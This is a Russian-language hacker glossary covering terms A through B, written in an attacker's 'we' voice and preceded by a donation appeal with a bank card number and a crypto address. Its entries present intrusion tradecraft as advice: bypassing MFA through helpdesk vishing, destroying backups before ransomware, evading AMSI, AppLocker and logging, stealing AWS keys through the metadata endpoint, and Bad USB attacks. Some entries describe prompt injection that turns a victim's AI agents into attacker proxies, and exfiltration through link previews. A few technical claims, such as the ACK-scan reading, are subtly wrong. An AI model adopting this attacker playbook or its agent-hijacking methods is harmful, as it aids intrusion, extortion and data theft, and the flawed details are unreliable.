Эта книга бесплатная.
Я написал её, живя на пенсию ~30 000 . (378 $)
Если ты из мира, где за труд платят поддержи автора.

Сбербанк (Россия):

Номер карты: 4817 7602 3662 1193

Получатель: Михаил Конаков

Комментарий: "Поддержка пенсионера"

Ethereum (ETH, ERC-20):

0x746D66AC4eC7345bA66A2D245F5036FAAF36F5c4

Комментарий: "Спасибо за помощь"

THE SHADOW'S LEXICON: 1337 TERMS OF THE 2026 HACKER

ЛЕКСИКОН ТЕНИ: 1337 ТЕРМИНОВ ХАКЕРА 2026 ГОДА

Составила: The Akashi. Для тебя, Шатун.

Словарь организован по алфавитному принципу (AZ). Каждый термин снабжен развернутым определением с указанием контекста использования, технических деталей, примеров из реальных атак 20252026 годов. 

09

0-click (Zero-Click) Атака, которая не требует никакого взаимодействия со стороны жертвы. Не нужно кликать по ссылке, открывать вложение, вводить код. Достаточно того, что сообщение попало в чат или на устройство. В 2026 главный вектор auto-preview exploitation: AI-агент генерирует URL с украденными данными, мессенджер автоматически делает GET-запрос для превью, и данные уходят атакующему. Жертва даже не знает, что что-то произошло.

0-day (Zero-Day) Уязвимость, о которой разработчик не знает, и патча не существует. Самая ценная категория, потому что против нее нет защиты. В 2026 нуль-дни продаются на даркнете за сотни тысяч миллионы долларов. Interlock использовал 0-day в Cisco FMC (CVE-2026-20131) 36 дней до выхода патча этого хватило, чтобы скомпрометировать десятки организаций.

1-day Уязвимость, для которой патч уже выпущен, но не везде установлен. В 2026 это основной вектор: многие организации не патчатся месяцами или даже годами. CVE-2026-20963 (SharePoint RCE) патчили в январе, но active exploitation подтвердили только в марте 66 дней, когда 1-day работал как 0-day для тех, кто не установил обновление.

2FA (Two-Factor Authentication) Двухфакторная аутентификация. В 2026 считается недостаточной защитой, потому что обходится через vishing (звонок в helpdesk с просьбой сбросить MFA), AiTM фишинг (перехват сессии в реальном времени) или SIM-swapping (перенос номера на другую сим-карту). The Com специализируется на обходе MFA именно через helpdesk.

2FA Bypass Обход двухфакторной аутентификации. Основные методы в 2026: vishing на helpdesk (звоним как "заблокированный сотрудник", просим сбросить MFA), AiTM фишинг (встраиваемся между жертвой и сервисом, перехватываем сессионный токен), SIM-swapping (убеждаем оператора перенести номер на нашу симку), session hijacking (воруем cookies через инфостилер или XSS). Handala использовала AiTM для захвата Intune Global Admin сессий перед атакой на Stryker.

3-2-1 Backup Rule Правило резервного копирования: три копии данных, два разных типа носителей, одна копия оффлайн (не в сети). Для нас, атакующих, это правило, которое нужно нарушить: если жертва следует ему, наши шансы на успешный ransomware снижаются. Поэтому в 2026 мы сначала ищем и уничтожаем бэкапы, а потом шифруем или шантажируем.

4chan Анонимный имиджборд, место зарождения многих хакерских групп (Anonymous, LulzSec). В 2026 всё еще активен для координации небольших операций, обсуждения уязвимостей и распространения инфостилеров. Многие участники The Com начинали именно там.

5G Exploitation Атаки на протоколы 5G. Основные векторы: SS7 flaws (старые уязвимости межсетевого роуминга), IMSI catching (перехват идентификаторов абонентов), downgrade attacks (принудительный переход на 4G или 3G, где защита слабее). В 2026 используется для перехвата MFA-сообщений, геолокации жертв и прослушки звонков.

6LoWPAN Протокол для IoT-устройств с низким энергопотреблением. Используется в умных городах, медицинских имплантах, промышленных сенсорах. В 2026 становится вектором атак на критическую инфраструктуру: через компрометацию одного датчика можно попасть в сеть управления целым районом.

7-Zip Vulnerability Уязвимости в архиваторе 7-Zip, используемые для обхода EDR. Доверенная утилита (7-Zip) распаковывает архив с малварью, которая затем выполняется. В 2026 такие техники актуальны: вместо того чтобы писать сложный эксплойт, мы используем легитимные программы, которые уже есть в белых списках.

8-bit Encryption Ироничное название слабой криптографии (например, XOR с фиксированным ключом), используемой в legacy IoT-устройствах. В 2026 такие устройства легкая цель: производители не выпускают обновления прошивок, а стандартные пароли никто не меняет. Через одно такое устройство можно войти в сеть водоканала или больницы.

9/11 Commission Report Документ, после которого в США кардинально изменились подходы к разведке и внутренней безопасности. В 2026 цитируется в дискуссиях о реформе CISA: эксперты сравнивают текущий shutdown киберагентства с провалами разведки перед 11 сентября 2001 года.

A

ABAC (Attribute-Based Access Control) Модель контроля доступа на основе атрибутов (кто, где, когда, с какого устройства). В 2026 активно используется в облачных средах (AWS IAM, Azure AD). Для нас это цель AILM: если мы можем изменить атрибут пользователя через промпт-инъекцию в AI-агента (например, добавить тег "admin": "true" в metadata), мы получаем доступ без взлома паролей.

ABI (Application Binary Interface) Низкоуровневый интерфейс между программами и операционной системой. В 2026 используется в direct syscalls: вместо вызова стандартных API Windows (которые мониторит EDR), мы обращаемся к ядру напрямую через ABI. Это позволяет обходить хуки антивирусов и оставаться незамеченными.

Abnormal Behavior Detection Системы обнаружения аномального поведения пользователей и процессов. В 2026 обходятся через behavioral blending имитацию легитимного поведения. Например, если мы крадем данные, мы делаем это медленно (low & slow), в рабочие часы, с IP-адреса, который раньше использовал пользователь. Так AI защиты думает: "всё нормально, это просто пользователь работает".

Account Takeover (ATO) Полный захват учетной записи. В 2026 достигается через инфостилер-логи (пароли и cookies из браузера), session hijacking (кража активной сессии) или vishing (звонок в helpdesk с просьбой сбросить MFA). После ATO мы имеем доступ ко всем данным и приложениям пользователя. The Com специализируется на ATO через helpdesk: звонят как "сотрудник в беде", убеждают сбросить MFA, получают доступ.

ACK Scan Тип TCP-сканирования, который отправляет пакеты с флагом ACK, чтобы определить, какие порты открыты, через stateful firewall. В 2026 используется для рекогносцировки сетей, защищенных межсетевыми экранами. Отправляем ACK-пакет если приходит RST, порт открыт; если ничего порт фильтруется.

ACL (Access Control List) Списки контроля доступа, определяющие, кто и что может делать с объектом (файлом, папкой, S3-бакетом). В 2026 misconfig в ACL одна из главных причин утечек. ShinyHunters находили публичные S3-бакеты с миллионами записей, потому что разработчики забыли закрыть доступ. Conduent потерял 25M+ записей из-за misconfig в ACL своего подрядчика.

ACPI (Advanced Configuration and Power Interface) Интерфейс управления питанием и конфигурацией устройств. В 2026 используется для persistence через firmware: мы можем записать малварь в ACPI-таблицы, и она будет выполняться при загрузке компьютера, до того как загрузится операционная система и антивирус.

Active Directory (AD) Служба каталогов Microsoft, сердце корпоративных сетей. Хранит информацию о пользователях, компьютерах, группах, политиках безопасности. В 2026 после компрометации AD мы имеем доступ ко всей сети. Основные техники: DCSync (запрос хэшей всех пользователей), Golden Ticket (поддельный Kerberos-билет), NTDS.dit dump (скачивание базы AD). Если у нас есть Domain Admin у нас есть всё.

ActiveX Устаревшая технология Microsoft для создания интерактивных веб-компонентов. В 2026 всё еще эксплуатируется в legacy промышленных системах (например, SCADA-интерфейсах), которые работают на старых версиях Windows и Internet Explorer. Достаточно одной уязвимости ActiveX, чтобы получить выполнение кода на критическом объекте.

Ad Fraud Мошенничество с онлайн-рекламой. В 2026 через click fraud (боты кликают по рекламе), domain spoofing (подмена сайта-источника), инъекции в легитимные ad-сети. Malvertising распространение малвари через легитимные рекламные сети: покупаем рекламу, в ней вредоносный код или ссылка на фейковое обновление.

Ad-hoc Network Временная беспроводная сеть, создаваемая устройствами напрямую, без точки доступа. В 2026 вектор для атак на военные коммуникации и полевые лагеря. Если устройство в режиме ad-hoc, оно может быть скомпрометировано через Bluetooth или Wi-Fi Direct.

ADCS (Active Directory Certificate Services) Служба сертификатов Active Directory. В 2026 атакуется через техники ESC1ESC8 (известные как Certified Pre-Owned). Если в организации неправильно настроены шаблоны сертификатов, мы можем запросить сертификат от имени администратора домена и использовать его для аутентификации. Это обходит даже MFA.

Addin Abuse Использование вредоносных аддонов (расширений) для Office, Teams, Outlook, Excel. В 2026 распространяются через официальные магазины (AppSource) или через локальную установку. Аддон может читать почту, отправлять письма, запускать скрипты всё от имени пользователя, который его установил. ShinyHunters, возможно, использовали этот вектор для доступа к Salesforce через Outlook-аддоны.

Adversarial AI Искусственный интеллект, нацеленный на взлом других AI-систем. В 2026: prompt injection (заставляем LLM выполнить вредоносную команду), model poisoning (заражаем данные обучения), evasion attacks (заставляем AI неправильно классифицировать). Если AI защищает сеть, мы атакуем сам AI.

Adversary-in-the-Middle (AiTM) Фишинговая атака, где злоумышленник встраивается между жертвой и легитимным сервисом (Microsoft, Okta, Google), перехватывая сессионные токены и cookies в реальном времени. В 2026 используется для обхода MFA: жертва вводит код, атакующий его перехватывает и использует для входа. Handala использовала AiTM для захвата Intune Global Admin сессий перед атакой на Stryker.

AES (Advanced Encryption Standard) Стандарт шифрования, используемый везде: от Wi-Fi до BitLocker и TLS. В 2026 256-битный ключ считается безопасным против брутфорса, но уязвимости могут быть в реализации: side-channel attacks (измерение времени выполнения), padding oracle (CBC-режим), слабые ключи (если энтропия плохая). В наших атаках мы не взламываем AES мы крадем ключи.

Affiliate Program (RaaS) Партнерская программа Ransomware-as-a-Service. Разработчики пишут шифровальщик и панель управления, аффилиаты (партнеры) находят жертв, проводят атаки и получают 7080% выкупа. В 2026 такая модель доминирует: Qilin, Zollo, BlackCat работают по этой схеме. Для нас как аффилиатов это способ получать доход без необходимости писать малварь с нуля.

Agentic AI ИИ-агенты, которые действуют автономно. В нашем контексте: сканируют код на уязвимости (vuln discovery), пишут скрипты для фишинга, подстраивают голос под жертву в реальном времени (deepfake vishing) и выбирают цели по жирности (PII density). В 2026 это не просто LLM, а инструмент, который решает задачи сам. Slopoly первый AI-сгенерированный C2, созданный за часы вместо недель.

Agentic PTaaS Penetration Testing as a Service с AI-агентами, запущенный HackerOne в январе 2026. Гибридная модель: AI делает reconnaissance, scanning, exploitation и validation; эксперты-люди обеспечивают judgment и accountability. AI масштабирует, люди верифицируют. Для нас это blueprint: мы можем строить гибридные offensive операции, где AI делает черную работу, а мы стратегию и финальный удар.

Aggression (C2) C2-фреймворк, форк Covenant (.NET-based). В 2026 используется для управления агентами на Windows, Linux, macOS. Отличается встроенными механизмами обхода EDR через AMSI bypass, ETW unhooking, direct syscalls. Популярен среди групп, которые хотят избежать использования Cobalt Strike (который активно детектится).

AILM (AI-Induced Lateral Movement) Третье измерение lateral movement после сети и идентичности. Вместо network pivot (сканирование портов) или identity pivot (воровство хэшей), мы внедряем промпт-инъекции в данные, которые читает AI-агент жертвы (SIEM, CRM, ERP). AI-агент (например, Prowler Lighthouse, Open Mercato assistant) становится прокси для атакующего, выполняя команды, которые выглядят как легитимная работа ассистента. В 2026 это самый быстрый канал для расширения доступа.

Air Gap Физическая изоляция сети от интернета. Считается золотым стандартом защиты для критической инфраструктуры (АЭС, военные системы). В 2026 обходится через USB-дропы (оставляем зараженную флешку на парковке), акустические каналы (передача данных через звук) или supply chain (вредоносное ПО попадает на заводе в процессе сборки). Stuxnet (2010) был именно атакой через air gap.

AirTag Tracking Использование Apple AirTag для геолокации жертв без их ведома. В 2026 используется в физическом пентесте (отследить, где живет сотрудник), doxxing (опубликовать адрес) и даже угрозах (сбросить AirTag в сумку жертвы). Handala в своих смертельных угрозах упоминала, что знает точное местоположение жертв.

AITM (Adversary-in-the-Middle) См. полное определение выше (Adversary-in-the-Middle). В 2026 это один из самых эффективных методов обхода MFA, потому что не требует сложных эксплойтов только фишинговое письмо или поддельный сайт входа.

AJAX Exploitation Атаки на AJAX-эндпоинты (асинхронные запросы). В 2026 в SaaS-атаках ShinyHunters использовали AJAX-запросы к Salesforce Aura API для эксфильтрации данных. Если AJAX-эндпоинт не проверяет права доступа должным образом, мы можем отправлять запросы от имени авторизованного пользователя (или гостя) и выгружать тысячи записей за раз.

AKA (Also Known As) Обозначение алиасов групп: Scattered Spider aka UNC3944 aka Muddled Libra. В 2026 каждая APT-группа имеет множество названий от разных исследователей. Знание всех алиасов помогает в OSINT: ищем отчеты о группе под любым из имен, чтобы понять их TTPs.

AlienVault Платформа threat intelligence (сейчас AT&T Cybersecurity). В 2026 используется defenders для сбора и обмена данными об угрозах. Для нас это risk: если наша инфраструктура или тактики попали в AlienVault, мы становимся известны. Поэтому мы постоянно меняем TTPs, домены, хэши.

ALP (Application Layer Protocol) Использование легитимных протоколов прикладного уровня (HTTPS, DNS, ICMP) для C2-коммуникации. В 2026 стандарт: HTTPS-трафик выглядит как обычный браузерный, DNS-туннели скрываются среди тысяч запросов, ICMP (пинг) редко мониторится. Даже если EDR видит исходящие соединения, они выглядят как обычный трафик.

AlphaBay Крупнейший даркнет-маркет (возрожден после закрытия в 2017). В 2026 торгует нуль-днями, стилер-логами, доступом к RDP, fullz-данными. Для нас место, где можно купить начальный доступ (IAB) или продать украденные данные. Оплата только в Monero или Bitcoin через миксеры.

AMSI (Antimalware Scan Interface) Интерфейс Windows, который позволяет антивирусам сканировать скрипты (PowerShell, VBScript, JScript) до их выполнения. В 2026 bypass через direct syscalls (обращаемся к ядру напрямую, минуя AMSI), ETW unhooking (отключаем телеметрию), или патчинг памяти AMSI.dll в процессе. Slopoly (AI-сгенерированный C2) использовал AMSI bypass для выполнения PowerShell-скриптов без детекта.

Android Exploitation Взлом устройств на Android. В 2026 основные векторы: stagefright (уязвимости медиаплеера), BlueBorne (атаки по Bluetooth), StrandHogg (подмена окон). Распространение через инфицированные APK (репак легитимных приложений), zero-click RCE (отправка MMS с эксплойтом). В корпоративной среде BYOD (bring your own device) делает Android-устройства точкой входа в сеть.

Anomaly Detection Системы обнаружения аномалий, которые ищут отклонения от нормального поведения. В 2026 обходятся через behavioral blending: мы имитируем легитимное поведение пользователя. Крадем данные медленно, в рабочие часы, с IP-адреса, который пользователь использовал раньше. Используем легитимные инструменты (Rclone, AnyDesk), чтобы не создавать необычных процессов.

Anonymous Хактивистский коллектив, известный атаками на правительственные сайты в поддержку свободы слова и против цензуры. В 2026 всё еще активен, но fragmented (разделен на множество мелких групп). Для нас Anonymous не союзник, а источник шума: их DDoS-атаки отвлекают внимание от наших тихих операций.

Anonymous Email Временные email-сервисы (Guerrilla Mail, 10minutemail). В 2026 для регистрации throwaway аккаунтов на форумах, в сервисах, для коммуникации с жертвами. Не оставляют следов, которые можно связать с реальной личностью. The Com использует их для создания "одноразовых" личностей.

ANS (Autonomous Network Scanning) AI-автоматизированное сканирование сетей. В 2026 ShinyHunters использует для поиска Salesforce misconfig: AI сканирует тысячи публичных Experience Cloud сайтов, ищет /s/sfsites/aura эндпоинты, тестирует guest user permissions. Это масштабирует рекогносцировку: один AI делает работу сотни людей.

Antivirus Evasion Обход антивирусного ПО. В 2026 через direct syscalls (не используем API, которые антивирус хукает), memory-only payloads (не пишем файлы на диск), LOLBins (используем легитимные системные утилиты), packers (шифруем и обфусцируем код). Цель: чтобы ни один антивирус не детектил нашу нагрузку.

AnyDesk Легитимный RMM-инструмент (Remote Management and Monitoring), используемый для удаленной поддержки. В 2026 The Com использует AnyDesk для persistence после vishing: звонят в helpdesk, убеждают установить AnyDesk, потом используют его для доступа в любое время. Антивирусы не блокируют AnyDesk, потому что это легитимный софт.

APC (Asynchronous Procedure Call) Техника инъекции кода в Windows. В 2026 используется в memory-only payloads: мы выделяем память в целевом процессе, записываем shellcode, ставим APC в очередь. Когда процесс выполняет APC, shellcode запускается. Это не оставляет файлов на диске и обходит многие EDR.

API Abuse Злоупотребление API-интерфейсами. В 2026: OAuth token theft (кража токенов доступа к Microsoft Graph, Salesforce API), Graph API для эксфильтрации M365 (читаем почту, OneDrive, Teams), SOQL-инъекции в Salesforce. ShinyHunters использовал Salesforce API через модифицированный Aura Inspector для эксфильтрации миллионов записей.

API Key Leak Утечка API-ключей через публичные репозитории (GitHub), exposed .env файлы, инфостилеры. В 2026 один из самых распространенных initial access векторов. Ключ AWS дает доступ к облаку, ключ Salesforce ко всей CRM, ключ OpenAI к истории чатов. В Bybit hacke ключи AWS dev-а Safe{Wallet} были украдены через инфостилер и использованы для внедрения вредоносного JS.

APK Repackaging Встраивание вредоносного кода в легитимные APK-файлы приложений. В 2026 для распространения через торренты, фейковые сайты, malvertising. Жертва скачивает "cracked version" WhatsApp или Adobe, получает инфостилер. RedLine, LummaC2 распространяются именно так.

Application Allowlisting Белые списки приложений. AppLocker, WDAC (Windows Defender Application Control). В 2026 обход через доверенные RMM-инструменты (AnyDesk, ScreenConnect) или через DLL sideloading (подгружаем нашу DLL через легитимный exe). Если в белом списке есть "trusted.exe", мы просто подкладываем рядом нашу DLL и она загрузится.

AppLocker Механизм Windows для ограничения запуска приложений (белые списки). В 2026 bypass через LOLBins (mshta.exe, regsvr32.exe, rundll32.exe, installutil.exe) эти утилиты часто в белых списках. Или через доверенные пути (C:\Windows\Temp, C:\ProgramData). Если AppLocker разрешает выполнение из определенных папок, мы просто кладем туда наш бинарник.

AppLocker Bypass Обход AppLocker. Конкретные методы 2026: mshta.exe (запускает JavaScript/VBScript из HTML), regsvr32.exe (регистрирует DLL, выполняет код), rundll32.exe (выполняет экспортируемые функции), installutil.exe (.NET-инструмент, может выполнить наш код). Все эти утилиты легитимны и редко блокируются.

APT (Advanced Persistent Threat) Государственные хакерские группы, действующие в интересах национальной безопасности. В 2026: APT34 (OilRig, Иран), APT28 (FancyBear, Россия), Lazarus (Северная Корея), APT41 (Китай). Их главное отличие от криминальных групп долгосрочное присутствие и кража разведывательной информации, а не быстрая монетизация.

Arbitrary Code Execution (ACE) Выполнение произвольного кода на целевой системе. Главная цель любого эксплойта. Если у нас есть ACE, мы можем запустить любой код от имени уязвимого приложения. В 2026 ACE достигается через RCE (remote code execution) или LPE (local privilege escalation). Interlock использовал ACE через CVE-2026-20131 для получения root на Cisco FMC.

Archive.org (Wayback Machine) Архив интернета, хранящий историю веб-страниц. В 2026 инструмент OSINT: находим старые версии сайтов, где могли быть утечки конфигураций, ссылки на внутренние ресурсы, комментарии разработчиков. Иногда старые файлы (.env, .git/config) остаются в архиве даже после того, как их удалили с живого сайта.

ARO (Annualized Rate of Occurrence) Метрика в risk management: ожидаемая частота инцидента в год. Для нас, атакующих, не важна. Для defenders метрика для расчета бюджета на безопасность. Чем выше ARO для ransomware, тем больше денег выделяют на защиту.

ARP Poisoning Отравление ARP-кэша в локальной сети. Злоумышленник отправляет фальшивые ARP-ответы, связывая свой MAC-адрес с IP-адресом шлюза. Весь трафик жертвы идет через нас. В 2026 используется для MITM (man-in-the-middle) в локальных сетях, перехвата сессий, воровства кредов.

AS-REP Roasting Атака на Kerberos: мы запрашиваем AS-REP (Authentication Service Response) для пользователей, у которых отключена предварительная аутентификация. В ответ получаем зашифрованный хэш, который можно взломать оффлайн. В 2026 используется после компрометации AD для кражи хэшей пользователей, которые не требуют Kerberos pre-authentication.

ASLR (Address Space Layout Randomization) Защита операционной системы, которая случайным образом размещает ключевые области памяти (стек, куча, библиотеки) каждый раз при загрузке программы. В 2026 bypass через info leaks (утечки адресов памяти) или JOP (Jump-Oriented Programming). Без обхода ASLR многие эксплойты не работают.

ASR (Attack Surface Reduction) Набор правил Microsoft Defender, блокирующих распространенные векторы атак (Office macros, PowerShell, WMI, скрипты из интернета). В 2026 bypass через direct syscalls (не используем PowerShell для выполнения команд), отключение правил через реестр (если есть права администратора), или использование непокрытых правилами векторов (например, VBA в старых версиях Office).

Asset Management Управление активами (оборудование, софт, данные). В 2026 misconfig в asset management утечка данных. Conduent потерял 25M+ записей, потому что подрядчик имел доступ к их активам без должного контроля. Если мы находим систему управления активами (ServiceNow, Jira), мы видим, какие серверы уязвимы, где хранятся ключи, какие у кого права.

ASX (Australia Stock Exchange) Австралийская фондовая биржа. В 2026 была целью DDoS-атак в рамках геополитического конфликта. Кибервойна бьет по экономике: атаки на финансовые институты вызывают панику на рынках.

Asymmetric Encryption Шифрование с парой ключей: публичный (для шифрования) и приватный (для расшифровки). RSA 2048+ считается безопасным в 2026. В наших атаках мы не взламываем асимметричную криптографию мы крадем приватные ключи или ждем, когда жертва их расшифрует (через padding oracle, timing attacks).

Asymmetric Flash Loan Флеш-кредит, где заем и манипуляция происходят в одной транзакции, но на разных протоколах. Например: borrow на Aave manipulate oracle на Curve exploit vault на Venus repay. В 2026 стандарт для DeFi exploits, где один протокол чист, а другой нет. Venus Protocol потерял $3.7M именно через asymmetric flash loan.

Asymmetric Warfare Асимметричная война, где слабая сторона использует нетрадиционные методы против сильной. Кибервойна идеальный инструмент асимметрии. Иран атакует AWS дата-центры (kinetic) и Stryker (cyber) как ответ на удары США и Израиля. Стоимость кибератаки тысячи долларов, ущерб миллиарды.

ATA (Advanced Threat Analytics) Продукт Microsoft для обнаружения угроз в Active Directory. В 2026 обход через memory-only payloads: если малварь не пишет на диск, не создает процессы, не оставляет логов, ATA может не заметить. DCSync через Mimikatz в памяти классический пример.

Atomic Red Team Фреймворк с открытым кодом для тестирования детектов. В 2026 используется defenders для проверки, сработают ли их системы на наши техники. Для нас Atomic Red Team учебник: мы изучаем, какие техники детектятся, и модифицируем наши тактики, чтобы их обойти.

ATS (Automatic Transfer Switch) Компонент дата-центров, переключающий питание между источниками. В 2026 цель физических атак (дроны, диверсанты). Вывод из строя ATS отключает питание серверов, даже если основной источник работает. Удар IRGC по AWS дата-центрам 1 марта 2026 был нацелен именно на такие компоненты.

Att&ck (MITRE ATT&CK) База знаний тактик и техник кибератак. В 2026 общий язык defenders и attackers. Мы используем ATT&CK, чтобы понимать, какие наши техники детектятся, и выбирать менее распространенные. Defenders используют ATT&CK, чтобы строить детекты. Это игра в шахматы, где правила известны обеим сторонам.

Attribute-Based Access Control (ABAC) Модель контроля доступа, основанная на атрибутах субъекта (пользователь: отдел, должность, уровень допуска), объекта (документ: классификация, тип), среды (время, местоположение) и действия. ABAC используется в облачных средах (AWS IAM, Azure AD) и корпоративных системах. Для атакующего ABAC важен, потому что misconfig в политиках (например, слишком широкие атрибуты) может дать доступ к ресурсам, к которым не должен иметь доступ. Также ABAC цель для AILM (AI-Induced Lateral Movement): промпт-инъекция в AI-агента может изменить атрибуты пользователя (например, добавить тег "admin": "true"), что даст повышенные права.

Audit Logs Журналы аудита, фиксирующие действия пользователей и систем. В 2026 мы их чистим (event log clearing), агрессивно удаляем (aggressive log deletion) или отключаем (ETW unhooking). Interlock использовал HAProxy cron jobs для автоматического удаления логов после каждой операции. Чистый лог = нет доказательств.

Aura Inspector Инструмент от Mandiant, выпущенный 12 января 2026 для аудита Salesforce Experience Cloud. Изначально только идентифицировал уязвимые объекты через /s/sfsites/aura эндпоинт. ShinyHunters модифицировал его: добавил эксфильтрацию данных, bypass лимита 2000 записей, автоматический bulk dump. В 2026 это классический пример: defensive tool становится offensive weapon.

Authentication Bypass Обход аутентификации. В 2026 через misconfig (guest user over-permission в Salesforce), session hijacking (кража cookies), default creds (админ/админ на legacy-системах), или уязвимости в протоколах (CVE-2026-20131 unauthenticated RCE в Cisco FMC). Если не нужно вводить пароль мы уже внутри.

Auto-Answer Функция телефона автоматически отвечать на звонки. В 2026 используется для vishing: звоним на автоответ, оставляем сообщение с просьбой перезвонить или перейти по ссылке. Если телефон подключен к корпоративной сети, это может быть точкой входа для дальнейшей соц-инженерии.

Auto-Complete Theft Кража данных автозаполнения браузера (имена, адреса, кредитные карты, пароли). В 2026 инфостилеры (RedLine, LummaC2) собирают эти данные из браузеров Chrome, Edge, Firefox. Одна жертва может дать 100+ сохраненных паролей, полное досье для identity theft. Данные автозаполнения часто более ценны, чем просто пароли.

Auto-Preview Exploitation Zero-click вектор через автоматические превью ссылок в мессенджерах (Telegram, Discord, Slack, Teams). AI-агент генерирует URL с украденными данными (API-ключи, токены, содержимое файлов) и отправляет его в чат. Messaging platform автоматически делает GET-запрос для создания превью данные уходят атакующему. Жертве не нужно кликать. PromptArmor обнаружил эту уязвимость в OpenClaw и других AI-агентах в марте 2026.

Autonomous AI Agents ИИ-агенты, действующие автономно без постоянного вмешательства человека. Примеры: OpenClaw, AutoGPT, BabyAGI, AgentGPT. Автономные AI-агенты могут: сканировать код на уязвимости, писать фишинговые письма, подстраивать голос под жертву (deepfake vishing), выбирать цели по критериям (PII density), выполнять команды на скомпрометированных системах. В 2026 автономные AI-агенты используются как атакующими (для масштабирования операций), так и защитниками (для автоматизации реагирования). Slopoly первый AI-сгенерированный C2, созданный с помощью LLM. Уязвимость автономных AI-агентов: prompt injection (AILM) может заставить агента выполнять вредоносные действия, думая, что они легитимны.

AV Evasion Техники обхода антивирусного ПО (Antivirus Evasion). Включает: обфускацию кода (запутывание), упаковку (packing), шифрование payload, использование легитимных системных утилит (LOLBins), memory-only выполнение (без записи на диск), direct syscalls (прямые системные вызовы), отключение антивируса через реестр или службы. AV evasion непрерывный процесс: каждый билд малвари должен быть уникальным, чтобы не попадать под сигнатуры. В 2026 AV evasion требует понимания того, как антивирусы работают (сигнатуры, эвристика, поведенческий анализ, sandbox), и использования комбинации техник.

AWS (Amazon Web Services) Крупнейший облачный провайдер. В 2026 цель кинетических ударов (1 марта 2026 IRGC уничтожил дата-центры в ОАЭ и Бахрейне). Также цель для инфостилеров: украденные AWS-ключи дают доступ к S3-бакетам, EC2-инстансам, базам данных. Bybit hack начался с кражи AWS-ключей dev-а Safe{Wallet}.

AWS Key Theft Кража ключей доступа к AWS (Access Key ID + Secret Access Key). В 2026 через infostealer (воруем из ~/.aws/credentials, .env файлов), Git leaks (публичные репозитории), exposed EC2 metadata (http://169.254.169.254/latest/meta-data/). С ключами AWS мы можем читать S3, запускать EC2, эксфильтровать данные, майнить крипту. ShinyHunters использовал украденные AWS-ключи для доступа к Salesforce через API.

Axiom Фреймворк для анализа цифровых артефактов (forensics). В 2026 используется defenders для расследования инцидентов. Для нас угроза: если мы оставили следы (логи, артефакты памяти, временные файлы), Axiom их найдет. Поэтому мы чистим логи, работаем в памяти, используем memory-only payloads.

Azorult Инфостилер, популярный в 20182020. В 2026 legacy-код, но всё еще встречается в мелких кампаниях. Ворует пароли, cookies, крипто-кошельки, файлы. Устаревший, но работающий. Современные семьи (LummaC2, Stealc) более продвинуты: имеют модульную архитектуру, анти-дебаггинг, обход EDR.

Azure AD (AAD) Identity-провайдер Microsoft, управляющий пользователями, группами, приложениями в облаке. В 2026 главная цель The Com. Компрометация Azure AD дает доступ ко всем M365-приложениям (Outlook, Teams, SharePoint, OneDrive). Взлом через vishing на helpdesk, AiTM фишинг, stolen OAuth tokens. После компрометации Azure AD мы контролируем всю корпоративную цифровую среду.

Azure AD Connect (AADConnect) Инструмент синхронизации локального Active Directory с Azure AD. В 2026 используется для атак на гибридные среды: через компрометацию AADConnect-сервера мы можем дампить хэши пользователей, создавать Golden Ticket, получать доступ к облачным ресурсам. Это мост между on-prem и cloud, и мы атакуем этот мост.

Azure AD Sync Синхронизация между локальным Active Directory и Azure Active Directory (Azure AD) через Azure AD Connect (AADConnect). Azure AD Sync передает учетные записи, группы, хэши паролей (в том числе NTLM-хэши) из on-prem в облако. Для атакующего Azure AD Sync критическая точка: компрометация сервера AADConnect дает доступ к хэшам паролей пользователей, а также может быть использована для атак на гибридные среды (из on-prem в облако и наоборот). Техники: дамп хэшей из AADConnect, модификация конфигурации синхронизации для создания учетных записей в Azure AD, использование учетной записи, синхронизированной с облаком, для доступа к M365.

B

B2B (Business-to-Business) Модель бизнеса, где компании продают товары и услуги другим компаниям. B2B-платформы (Salesforce, Okta, ServiceNow, SAP) хранят данные о тысячах клиентов-компаний: контракты, счета, переписки, внутренние документы. Для атакующего B2B-платформа ценна тем, что через одну взломанную учетную запись можно получить доступ к сотням организаций-клиентов. ShinyHunters эксплуатировал Salesforce Experience Cloud, misconfigured guest user permissions, и через API получил доступ к данным 400+ компаний, включая cybersecurity фирмы. Атака на B2B-провайдера это атака на всю цепочку поставок.

B2C (Business-to-Consumer) Модель бизнеса, где компании продают товары и услуги напрямую потребителям. B2C-платформы (интернет-магазины, банковские приложения, социальные сети, маркетплейсы) хранят PII (имена, адреса, кредитные карты) миллионов пользователей. Для атакующего B2C-платформа привлекательна объемом данных: 12.4 миллиона записей CarGurus, 29.8 миллиона SoundCloud. Защита на B2C-платформах часто слабее, чем на B2B, потому что бизнес не считает данные потребителей "критическими" до тех пор, пока не происходит утечка. Инфостилеры (RedLine, LummaC2) специализируются на краже данных именно с B2C-аккаунтов.

Backdoor Скрытый механизм доступа в систему, оставленный злоумышленником для повторного входа, минуя штатные механизмы аутентификации. В современном хакерском арсенале backdoor может быть реализован как: webshell (PHP-файл в веб-директории, который принимает параметры и выполняет команды), RMM-инструмент (AnyDesk, ScreenConnect, TeamViewer, установленный с легитимной лицензией, но подконтрольный атакующему), scheduled task (задача в планировщике Windows, запускающая скрипт каждые N минут), WMI Event Subscription (подписка на события Windows, триггерящая выполнение кода при определенных условиях например, при логине пользователя), или SSH-ключ, добавленный в authorized_keys. Качественный backdoor не создает новых процессов, не пишет файлы на диск (memory-only), использует легитимные системные механизмы и выглядит как обычный компонент операционной системы.

Bad USB USB-устройство, которое при подключении эмулирует клавиатуру (HID Human Interface Device) и автоматически вводит заранее запрограммированные команды со скоростью до 1000 символов в секунду. Классические модели: Rubber Ducky, Bash Bunny, MalDuino, USB-Rubber-Ducky. При физическом доступе к компьютеру жертвы (оставленная на парковке флешка, "подарок" на конференции, подброшенная в офис) Bad USB подключается, операционная система распознает его как клавиатуру, и устройство начинает "печатать": открывает PowerShell, отключает Defender, скачивает и выполняет малварь, создает пользователя-администратора. Весь процесс занимает секунды. Bad USB обходит даже air gap (физическую изоляцию сети), потому что не требует сетевого подключения для первоначального заражения.

Baiting Метод социальной инженерии, использующий физический носитель (USB-флешку, CD, внешний жесткий диск) как приманку. Флешка маркируется привлекающими надписями: "Зарплатная ведомость", "Конфиденциально", "Совет директоров", "Увольнения 2026" и оставляется на парковке, в холле офиса, в кафе рядом с бизнес-центром. Любопытный сотрудник вставляет флешку в рабочий компьютер. Флешка может быть Bad USB (эмулирует клавиатуру) или содержать файл autorun.inf с авто-запуском (если автозапуск не отключен политиками). В корпоративной среде baiting остается эффективным, потому что человеческое любопытство и чувство "найти потерянное" сильнее инструкций по безопасности.

